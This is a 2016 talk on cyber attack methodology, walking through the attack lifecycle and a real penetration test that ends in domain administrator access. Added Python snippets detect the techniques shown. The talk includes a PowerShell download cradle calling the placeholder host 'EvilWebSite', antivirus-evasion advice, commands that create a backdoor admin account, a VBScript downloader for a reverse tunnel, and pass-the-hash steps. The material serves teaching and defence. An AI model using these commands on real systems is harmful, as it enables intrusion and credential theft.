DIGITAL SECURITY FRONTLINE Cyber Security Attack Methodologies

Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - December 2016


Agenda

• Objectives

• Introduction

• Cyber Attack Lifecycle

• Vulnerabilities and Exploitation

• Example of a penetration test scenario

• Conclusion

Objectives


Get insights on the methodologies used during a Cyber Attack

Understand how hackers penetrate a network, elevate their privileges, maintain persistence and hide their malicious activities

Show hands-on:

Provide a concrete example using Metasploit tool

Show a Demo in real time

Deep dive into a real life pentesting exercise

Understand what can be done to protect against cyber attacks

Introduction


Frédéric De Pauw

Co-Founder / Offensive Security @Avanguard

Ethical Hacker

Head IT Security @Ethias

Freelance Ethical Hacker (BE – LUX – US)

https://be.linkedin.com/in/fdepauw

Introduction

What is Cyber Crime?

Computer crime, or cybercrime, is crime that involves a computer and a network

Two types of Cyber Crime:

Technology is the target: enterprise systems, state systems, personal systems

Technology is the instrument: criminal activities on the Internet

This session is focused on the first type

Introduction

Technology = Target:

• Distributed Denial of Service

• Hacking

• Malware, Ransomware

• Phishing

• Hacktivism

• …

Technology = Instrument:

• Child pornography

• Incitement to racial hatred

• Incitement to terrorism

• Money laundering

• Drug sales

• Spam

Introduction > Cyber Crime

Has drastically evolved over the past years, following the global evolution of ICT supporting human activity

Allows cyber criminals to make profits equivalent to other types of criminality

Offers some advantages over other criminal activities: anonymity, discretion, no borders

Remains little fought against, with no international legislation

Has evolved into cyber war with state-sponsored attacks

Will affect our daily lives (connected cars, Operational Technologies, IoT)

Cost of Cyber Crime in Belgium: 3.5 billion euros

Introduction

• Evolution of Cyber Crime (timeline, sophistication increasing over time)

1985-1995: Entertainment, first worms, phone hacking

Then: Hacktivism, virus spread, website defacement

Then: Organized crime, DDoS, company systems hacking, data leaks, industrial espionage

2010-2016-…: Cyber war, targeted attacks, state-sponsored attacks

Introduction

Future of Cyber Crime

Intensification of targeted cyber attacks against enterprises with important impacts (financial, reputational, ...)

Predominance of Advanced Persistent Threats targeting the end user

Intensification of cyber war / cyber espionage activities between nations

Increase of cyber crime targeting connected objects and operational technologies

Hacking of a plane - 2015

Hacking of a pacemaker - 2013

Car hacking - 2015

Introduction

Legal evolution

General Data Protection Regulation (GDPR) – adopted end of 2016 – comes into force 25 May 2018

Circulars of the National Bank of Belgium: regulation for the financial sector

Data breach notification standard: within 72 hours

Fines in case of data leak: max 4% of turnover, maximum 20 M€

Cyber Attack Life Cycle

Cyber Attack Lifecycle

1. Reconnaissance: public information, social networks, vulnerability scanning, physical observation

2. Initial Infection: vulnerabilities, virus / malware, social engineering, physical intrusion

3. Gain Control: control the infected system

4. Privilege Escalation: gain elevated privileges on the infected system

5. Lateral Movement: compromise more systems deeper in the network

6. Persistence: maintain a persistent connection with infected systems

7. Malicious Activities: data exfiltration, hacking websites, money extortion, ...

Cyber Attack Lifecycle > Reconnaissance

The reconnaissance process is a key activity

Indeed, during this phase crucial information is obtained in order to perform a cyber attack

For instance, the information will be used to determine the best attack vector to be used

Activities performed are:

Collect information concerning the target (websites, telephone numbers, general mailboxes, ...) through public information

Collect information through direct contact such as phone calls (fake poll, job seeker, ...)

Collect technical information concerning the target information system (exposed systems, partners, data centers, ...)

Collect information on premises (garbage, WiFi scanning, ...)

Actively scan enterprise networks exposed on the Internet

Cyber Attack Lifecycle > Reconnaissance

Commercial tool: Maltego

Free tools (Kali Linux):

• recon-ng

• DMitry

• theHarvester

Cyber Attack Lifecycle > Reconnaissance

WiFi reconnaissance and hacking tools from hakshop.com

Cyber Attack Lifecycle > Reconnaissance

Following the reconnaissance activities, attackers must have obtained enough information to determine the best attack vectors for the initial infection phase

For instance:

Vulnerabilities affecting systems exposed on the Internet

Lack of physical access control to facilities

Social engineering attack on selected profiles, based for instance on social network information

Cyber Attack Lifecycle > Initial Infection

Initial Infection is aimed at obtaining a first backdoor within the target information system

Vectors:

Exploiting a vulnerability affecting the victim’s system(s)

Infection through Virus / Malware

Exploiting a physical vulnerability

Installing rogue access points or devices

Cyber Attack Lifecycle > Initial Infection

[Diagram: initial infection surface per zone]

• Perimeter: on-prem applications, servers / appliances, security technology

• Public Cloud: SaaS applications, servers / appliances, security technology

• Private Cloud: corporate applications, servers / appliances, security technology

• Corporate Network: corporate applications, servers / appliances, security technology, end users

Cyber Attack Lifecycle > Initial Infection

LAN Turtle from Hakshop

https://youtu.be/l8YpTOv7Q2A

Cyber Attack Lifecycle > Initial Infection

IDS/IPS bypass

• Encryption

Anti-Virus bypass

• Use a simple PowerShell dropper which fetches an encrypted payload over the Internet:

    powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt'))"

• Unknown viruses

• Use staging to decouple the payload from the initial dropper

• The dropper is injected directly into memory

Firewall bypass

• Uses “reverse” connections which connect back to the C&C

• E.g. HTTPS passing through the enterprise proxy
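As an added defensive example (not from the original talk): a scorer over process command-line records that flags the PowerShell download-cradle pattern shown above (a download primitive combined with in-memory execution). The `host|user|command_line` record format and the sample events are constructed for the example; the patterns are a starting point, not a complete ruleset.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Download primitives commonly combined with in-memory execution in a dropper.
DOWNLOAD_PRIMITIVES = re.compile(
    r"(downloadstring|downloadfile|downloaddata|net\.webclient|invoke-webrequest|"
    r"\biwr\b|\bcurl\b|\bwget\b|start-bitstransfer)", re.IGNORECASE)
# Invoke-Expression / IEX executes the fetched text without writing it to disk.
IN_MEMORY_EXEC = re.compile(r"(\biex\b|invoke-expression)", re.IGNORECASE)
# Flags that hide the window, skip profiles or bypass execution policy.
EVASION_FLAGS = re.compile(
    r"(-nop\b|-noprofile|-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|"
    r"-ep\s+bypass|-executionpolicy\s+bypass)", re.IGNORECASE)

@dataclass
class Finding:
    host: str
    score: int
    reasons: List[str]

def score_command_line(cmd: str) -> Tuple[int, List[str]]:
    """Score one process command line; higher means more cradle-like."""
    reasons: List[str] = []
    score = 0
    if "powershell" not in cmd.lower():
        return 0, reasons
    if DOWNLOAD_PRIMITIVES.search(cmd):
        score += 2; reasons.append("download primitive")
    if IN_MEMORY_EXEC.search(cmd):
        score += 2; reasons.append("in-memory execution (IEX)")
    if EVASION_FLAGS.search(cmd):
        score += 1; reasons.append("evasion flag")
    if re.search(r"https?://", cmd, re.IGNORECASE):
        score += 1; reasons.append("remote URL")
    return score, reasons

def scan_events(lines, threshold: int = 4) -> List[Finding]:
    """Parse constructed 'host|user|command_line' records (the shape of Windows
    process-creation auditing with command-line logging) and return findings
    scoring at or above threshold."""
    findings = []
    for line in lines:
        host, _user, cmd = line.split("|", 2)
        score, reasons = score_command_line(cmd)
        if score >= threshold:
            findings.append(Finding(host, score, reasons))
    return findings

# Constructed sample events; the third mirrors the dropper on the slide.
SAMPLE_EVENTS = [
    "WS01|alice|powershell.exe -File C:\\scripts\\backup.ps1",
    "WS02|bob|cmd.exe /c dir",
    "WS03|carol|powershell.exe \"IEX ((new-object net.webclient)"
    ".downloadstring('http://EvilWebSite/payload.txt'))\"",
    "WS04|dave|powershell.exe -nop -w hidden -enc SQBFAFgA",
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f.host, f.score, ", ".join(f.reasons))
```

The encoded-command sample (WS04) scores only 1 here: a deployment would decode `-enc` arguments before scoring, otherwise the same cradle passes unnoticed.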

Cyber Attack Lifecycle > Initial Infection

Free tool for malware code obfuscation: Veil-Evasion Framework

Generates obfuscated payloads using several methodologies

Metasploit Meterpreter payloads

Generates payloads from different sources:

C/C++ shellcode

PowerShell shellcode

Python shellcode

Cyber Attack Lifecycle > Initial Infection

Metasploit + Veil framework

Create a Meterpreter backdoor obfuscated with Veil

PowerShell type

Cyber Attack Lifecycle > Initial Infection

Metasploit + Veil Framework

Create a Meterpreter backdoor using Veil for antivirus avoidance

Embed the virus in a Word macro or create a .bat file; either include the payload or fetch it from a web server

Cyber Attack Lifecycle > Initial Infection

Start the Listener on Metasploit

More during the Demo

Cyber Attack Lifecycle > Gain Control

Once the initial infection is performed, the objective is to get control over the machine.

For this, a network connection must be established between the victim and the Command & Control server

In general a « reverse » connection is made, to bypass inbound firewall protection

Several techniques exist to bypass outbound filtering (if present)

Cyber Attack Lifecycle > Gain Control

Standard Enterprise security principles for Outbound filtering:

Default policy is to deny all outbound connections

Allowed outbound connections must go through a proxy

Outbound connections must conform to the expected protocol

Outbound connections must pass other checks as well.

Outbound filtering evasion techniques, examples:

Reverse HTTP and / or HTTPS traffic (with or without proxy settings verification)

Payload staging over DNS by placing the payload in the TXT records of a domain
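As an added detection example (not from the original talk): payload staging over TXT records produces many TXT queries for distinct labels under one domain, each returning a large answer. The resolver log format below is constructed, and the registrable-domain heuristic is a simplification noted in the code.

```python
from collections import defaultdict

# Constructed resolver log lines: time client qtype qname answer_size_bytes.
SAMPLE_DNS_LOG = [
    "10:00:01 10.0.1.5 A www.example.com 16",
    "10:00:02 10.0.1.5 TXT _dmarc.example.com 80",
    "10:00:03 10.0.1.7 TXT s0.stage.evil-cdn.test 255",
    "10:00:03 10.0.1.7 TXT s1.stage.evil-cdn.test 255",
    "10:00:03 10.0.1.7 TXT s2.stage.evil-cdn.test 255",
    "10:00:04 10.0.1.7 TXT s3.stage.evil-cdn.test 255",
    "10:00:04 10.0.1.7 TXT s4.stage.evil-cdn.test 255",
    "10:00:05 10.0.1.7 TXT s5.stage.evil-cdn.test 120",
    "10:00:06 10.0.1.9 TXT example.com 60",
]

def registered_domain(qname: str) -> str:
    """Crude registrable-domain heuristic (last two labels); a real deployment
    would use the Public Suffix List instead."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])

def parse(line: str):
    ts, client, qtype, qname, size = line.split()
    return ts, client, qtype.upper(), qname, int(size)

def find_txt_staging(lines, min_labels: int = 5, min_bytes: int = 1000):
    """Aggregate TXT queries per (client, domain) and flag pairs where many
    distinct names under one domain return a large total of TXT data: the
    shape of a payload split across TXT records and fetched chunk by chunk.
    Legitimate TXT use (SPF, DMARC, verification tokens) is a handful of
    names with small answers and stays below both thresholds."""
    stats = defaultdict(lambda: {"names": set(), "bytes": 0})
    for line in lines:
        _, client, qtype, qname, size = parse(line)
        if qtype != "TXT":
            continue
        entry = stats[(client, registered_domain(qname))]
        entry["names"].add(qname.lower())
        entry["bytes"] += size
    flagged = []
    for (client, domain), entry in sorted(stats.items()):
        if len(entry["names"]) >= min_labels and entry["bytes"] >= min_bytes:
            flagged.append({"client": client, "domain": domain,
                            "labels": len(entry["names"]), "bytes": entry["bytes"]})
    return flagged

if __name__ == "__main__":
    for hit in find_txt_staging(SAMPLE_DNS_LOG):
        print(hit)
```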

Cyber Attack Lifecycle > Gain Control

Metasploit / Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Cyber Attack Lifecycle > Privilege Escalation

Escalate privileges from infected machines in order to gain elevated access

Typical example: getting Administrator or SYSTEM privileges

Several techniques:

« Local Exploits » from local applications on the infected machine

Manual search for credentials in scripts

Password Hashes dump (e.g. SAM, /etc/passwd) and cracking

Authenticated Sessions grabbing (e.g. VPN Sessions)

SSH Keys

World Writeable files

Read command history files

Batches / Jobs alteration

Process Injection

Try injecting malicious code in processes running under « Domain Admin » privileged user

Cyber Attack Lifecycle > Privilege Escalation

Metasploit: « Incognito » module

Allows impersonation of authentication tokens on compromised Windows hosts

The backdoor must run under « SYSTEM » or « Administrator » privilege in order to see interesting authentication tokens

TIP: File servers are virtual treasure troves of tokens, since most file servers are used as network attached drives via domain logon scripts

Cyber Attack Lifecycle > Lateral Movement

From infected systems, try to infect more systems deeper in the network

Basically repeat the Cyber Attack Lifecycle process (recon, initial infection, privilege escalation, …)

Aim for high value systems: Windows domain controllers, file servers, ...

Techniques:

Credential re-use / pass-the-hash / SSH key re-use

Internal application vulnerabilities (less often patched)

Network segmentation issues between environments (e.g. port 445) – PsExec with Pass-The-Hash

Cyber Attack Lifecycle > Lateral Movement

Metasploit – Pivoting technique

Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems

1. Use Autoroute to make the compromised host a pivot to other networks

2. Scan the network through the route created on ports 139 & 445

3. Start a new session on a new host using PsExec and the “Pass-The-Hash” technique, re-using the local Administrator password hash

Cyber Attack Lifecycle > Maintain Persistence

Prevent loss of connection between infected machines and the C&C

Techniques

Create jobs / schedule tasks

Create service running on startup

Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)

Bootkit / Rootkit

Default file association

Logon Scripts

Modification of Applications / Services

Registry RUN keys

Cyber Attack Lifecycle > Maintain Persistence

Metasploit / Persistence module

Create a Meterpreter service which will start when the compromised host boots


Cyber Attack Lifecycle > Demo

Social engineering scenario

Send a « virus » to the victim which consists of a Metasploit Meterpreter instance

Undetected by up-to-date commercial antivirus

1. Prepare Malware & environment

2. Send Malware

3. Execute Malware

4. Get infected & Contact C&C

5. Interact

Vulnerabilities and Exploitation

Vulnerabilities and Exploitation

A vulnerability is a flaw in a system which allows a malicious user to compromise its confidentiality, integrity and / or availability

Simple: default password. Complex: buffer overflow in an application

Dozens of new vulnerabilities are officially classified every day

http://www.cvedetails.com

Dozens of others are not disclosed!

0DAY – vulnerabilities not discovered, or not disclosed

Vulnerabilities are discovered by:

Researchers, students (ethical hackers)

Professional researchers (vulnerability brokers)

http://www.zerodayinitiative.com/

France: Vupen Security – sells vulnerabilities to NASA

Cyber criminals (0DAYs)

Vulnerabilities and Exploitation

Full Disclosure principle

Vulnerabilities are reported and published publicly as soon as they are discovered, regardless of whether a patch is available

Responsible disclosure principle

Vendors are notified first

The vulnerability is publicly disclosed after 45 days

Websites with vulnerabilities and associated exploits

www.securityfocus.com

www.1337day.com (not free)

http://www.cvedetails.com/

http://www.exploit-db.com/

Underground Websites on TOR network

Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR), ccc.de (DE), blackhat.com (US)

Vulnerabilities and Exploitation

Complexity of systems, application code, communication flows, network segmentation

Out-of-the-box vulnerabilities of vendor solutions, lack of security configuration

Next->Next->Next syndrome

Lack of secure coding awareness

OWASP Top 10

Lack of enforcement of security during IT projects

Security implies cost and time

Need for functionality <-> Need for security

Blacklist mode

Learning mode

Penetration test example

• Context: Black Box intrusion test. Scope: external-facing systems

[Diagram: web servers in the DMZ exposed on ports 80 (HTTP) and 443 (HTTPS); the intranet / internal network hosts the enterprise Windows domain]

Penetration test example

• VULN 1/2: Vulnerable deployment of SAP BO (Apache Axis2)

  • CVE-2010-0219, Apache Axis2 default credentials

  • http://www.securityfocus.com/bid/40343, Apache Axis2 directory traversal

• See earlier:

  • Vuln « Directory Traversal »

  • Vuln « Default Password »

• Allows obtaining admin credentials to Axis2

Penetration test example

• Access to the Axis2 administration allows uploading a web service and hot-deploying it

Penetration test example

• A Metasploit module exists to exploit this vuln: Axis2 / SAP BusinessObjects Authenticated Code Execution

• http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer

• We use it to deploy a reverse shell backdoor on the server, which connects back to port 80

• VULN 3: The server is allowed to contact any host on the Internet on ports 80 and 443

[Diagram: the DMZ web servers (ports 80 HTTP and 443 HTTPS exposed inbound) connect out on port 80 to the C&C server on the Internet; the enterprise Windows domain sits on the internal network]

Penetration test example

• Not possible to upload a meterpreter (killed by AV on the machine)

• Possible to upload a backdoor which sends me back a DOS command prompt on the server

Penetration test example

• Next steps:

• Create a privileged account on the server

  • VULN 4: The application server is running under ADMIN privileges

  • net user temptest password /add

  • net localgroup Administrators hacked /add

• Obtain a Remote Desktop connection

  • Problem: port 3389 closed inbound

  • Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389

[Diagram: the web server keeps its backdoor to the C&C server on port 80 and opens a reverse SSH tunnel on port 443 to the SSH server; port 3389 (RDP) is forwarded back through that tunnel]

Penetration test example

• To create the tunnel, I need to download an SSH client onto the server using the DOS command prompt

• I create a VBScript file using the « echo » command, then execute the VBScript:

  • echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs

  • cscript dl.vbs

• Use plink to create the tunnel

Contents of dl.vbs:

    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", "http://www.putty.com/plink.exe", False
    xHttp.Send

    with bStrm
        .type = 1 '//binary
        .open
        .write xHttp.responseBody
        .savetofile "c:\temp\plink.exe", 2 '//overwrite
    end with

Penetration test example


Connect to RDP through the tunnel and log in with the user account I just created (temptest / password)

Penetration test example

Next step -> Lateral Movement – the simplest first: credential reuse

I need to crack all passwords present locally on the infected server

Vuln 6/7: Windows 2003 design vulnerabilities

VULN 6: The « Repair » file contains a SAM backup file with credentials stored as LM hashes

VULN 7: The LM hash algorithm is broken and can be cracked easily

Penetration test example

After some minutes

Penetration test example

VULN 8: Local Administrator password is replicated over all systems in the DMZ
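As an added audit example (not from the original talk) covering VULN 6/7 and VULN 8: a checker over pwdump-format SAM dumps from several hosts that reports accounts whose LM hash is stored at all, accounts whose LM second half is the well-known empty-half value (the password is 7 characters or fewer, so only one DES block needs cracking), and local Administrator (RID 500) hashes shared across hosts. The dumps below are constructed; the hash values in them are placeholders, not real hashes.

```python
from collections import defaultdict

# Well-known constants: the LM field when no LM hash is stored, the LM hash of an
# all-padding 7-byte half, and the NT hash of the empty password.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed pwdump-style dumps (user:rid:lmhash:nthash:::), one list per DMZ host.
SAMPLE_DUMPS = {
    "web01": [
        "Administrator:500:0123456789abcdeffedcba9876543210:fedcba9876543210fedcba9876543210:::",
        "svc_axis:1001:aad3b435b51404eeaad3b435b51404ee:11112222333344445555666677778888:::",
        "temptest:1002:89abcdef0123456faad3b435b51404ee:aaaabbbbccccddddeeeeffff00001111:::",
    ],
    "web02": [
        "Administrator:500:0123456789abcdeffedcba9876543210:fedcba9876543210fedcba9876543210:::",
    ],
    "web03": [
        "Administrator:500:0123456789abcdeffedcba9876543210:fedcba9876543210fedcba9876543210:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    ],
}

def parse_dump(lines):
    """Yield (user, rid, lm, nt) from pwdump lines; hashes normalised to lowercase."""
    for line in lines:
        user, rid, lm, nt = line.split(":")[:4]
        yield user, int(rid), lm.lower(), nt.lower()

def audit_host(hostname, lines):
    """Per-account findings for one host's dump."""
    findings = []
    for user, _rid, lm, nt in parse_dump(lines):
        if nt == EMPTY_NT:
            findings.append((hostname, user, "empty password"))
        if lm != EMPTY_LM:
            findings.append((hostname, user, "LM hash stored (crackable)"))
            if lm[16:] == EMPTY_LM_HALF:
                findings.append((hostname, user, "LM second half empty: password is 7 characters or fewer"))
    return findings

def shared_admin_hashes(dumps):
    """Group hosts by the NT hash of RID 500. Identical hashes mean an identical local
    Administrator password, so one cracked or passed hash opens every host in the group."""
    by_hash = defaultdict(list)
    for host, lines in dumps.items():
        for _user, rid, _lm, nt in parse_dump(lines):
            if rid == 500:
                by_hash[nt].append(host)
    return {h: sorted(hosts) for h, hosts in by_hash.items() if len(hosts) > 1}

if __name__ == "__main__":
    for host, lines in SAMPLE_DUMPS.items():
        for finding in audit_host(host, lines):
            print(*finding)
    print("shared local Administrator hashes:", shared_admin_hashes(SAMPLE_DUMPS))
```

The fix on the page's side is the one the talk implies: stop storing LM hashes (NoLMHash policy), and give each host a unique local Administrator password.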

[Diagram: from the first web server, RDP (port 3389) to the other DMZ web servers using the replicated local Administrator password; the C&C connection on port 80 and the reverse SSH tunnel to the SSH server on port 443 remain as before]

Penetration test example

Next step: try to hit the internal network

VULN 9: DMZ systems are members of the internal Windows domain. This means that critical ports (e.g. 139, 445, …) must be open between the DMZ and the internal network

VULN 10: Password replication, again – a Domain Admin user account with the same name as a local account has the same password

Penetration test example

I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and have full control over the Enterprise Domain

[Diagram: from the DMZ web servers (ports 80 HTTP and 443 HTTPS) into the intranet / internal network: the enterprise Windows domain and its Domain Controller]

Conclusion

Cyber Crime will continue to be a major threat for enterprises in the coming years

Computer vulnerabilities will continue to be discovered and will continue to affect enterprises

Legacy technologies such as standard AV are no longer sufficient to protect against cyber threats

Operational IT Security programs must address security incident response and each of the following:

Awareness

Preventive security

Detective security

Corrective security

Conclusion

[Personal Statement] Be careful with the notion of Risk-Based Security, based on asset classification

Should less critical systems be given less attention in terms of security?

What if a hacker can compromise a system in a non-critical zone and obtain credentials that are re-used in other zones? What if the enterprise does not have one Windows Domain per Risk Domain?

Use Risk-Based security only if you have full IT isolation… and even then, is that enough?

Awareness

Educate all your employees about emerging cyber threats

Run real social-engineering exercises, sending undetected viruses to your employees

Be mindful of human reactions

Educate, but also protect, the colleagues who get infected during the exercise

Conclusion

Preventive Security

Sandboxing technologies must be implemented in parallel with standard signature-based AV to protect against APTs

Implement NAC

Identify your vulnerabilities before the hackers do

Network security must be governed: network segmentation policies, firewall rules governance, flow and application control, inbound and outbound traffic policies, ...

High Privileges Management

Isolation of network tiers

Use hardening best practices

E.g. Remove admin rights from end users and from applications (least privilege)

Implement correct Windows security settings

Conclusion

Detective security

Real-time correlation of technical use cases has real added value

Monitor for accounts creation on any system

Monitor any “Domain Admin” privilege elevation

Monitor for internal scans

Monitor authentication failures

Monitor denied outbound traffic
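As an added example (not from the original talk) of the correlation use cases listed above: a small rule engine over Windows Security event IDs that alerts on account creation (4720), on a newly created account being added to an administrative group shortly afterwards (4732 local / 4728 domain, the `net user` + `net localgroup` sequence from the pentest), and on bursts of authentication failures (4625). The event records are constructed; the field names are this example's own simplification of the real event schema.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

ADMIN_GROUPS = {"Administrators", "Domain Admins"}

# Constructed Security events (id, time, host, target, optional group / source).
SAMPLE_EVENTS = [
    # five failed logons from one source within a minute (credential guessing / reuse)
    *[{"id": 4625, "time": f"2016-12-01T10:00:{s:02d}", "host": "WEB02",
       "target": "Administrator", "src": "10.0.2.15"} for s in (5, 9, 14, 20, 31)],
    {"id": 4720, "time": "2016-12-01T10:05:00", "host": "WEB01", "target": "temptest"},
    {"id": 4732, "time": "2016-12-01T10:05:30", "host": "WEB01", "target": "temptest",
     "group": "Administrators"},
    {"id": 4728, "time": "2016-12-01T11:10:00", "host": "DC01", "target": "temptest",
     "group": "Domain Admins"},
    {"id": 4720, "time": "2016-12-01T12:00:00", "host": "HR01", "target": "newhire"},
]

def correlate(events, creation_window=timedelta(minutes=10),
              fail_threshold=5, fail_window=timedelta(seconds=60)):
    """Return (rule, host, subject) alerts, processing events in time order."""
    alerts = []
    created = {}                   # (host, account) -> creation time
    failures = defaultdict(deque)  # source -> recent failure times
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        key = (ev["host"], ev["target"])
        if ev["id"] == 4720:
            # Any account creation is reported; creation time kept for the next rule.
            created[key] = t
            alerts.append(("account created", ev["host"], ev["target"]))
        elif ev["id"] in (4728, 4732) and ev.get("group") in ADMIN_GROUPS:
            # Elevation of an account created moments earlier is the pentest pattern.
            if key in created and t - created[key] <= creation_window:
                alerts.append(("new account made admin", ev["host"], ev["target"]))
            else:
                alerts.append(("privilege elevation", ev["host"], ev["target"]))
        elif ev["id"] == 4625:
            q = failures[ev["src"]]
            q.append(t)
            while q and t - q[0] > fail_window:   # drop failures outside the window
                q.popleft()
            if len(q) == fail_threshold:           # fire once when the threshold is hit
                alerts.append(("authentication failure burst", ev["host"], ev["src"]))
    return alerts

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(*alert)
```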

Corrective Security

Have emergency security procedures for containment defined and tested

Have a security incident response plan

Have a patching policy
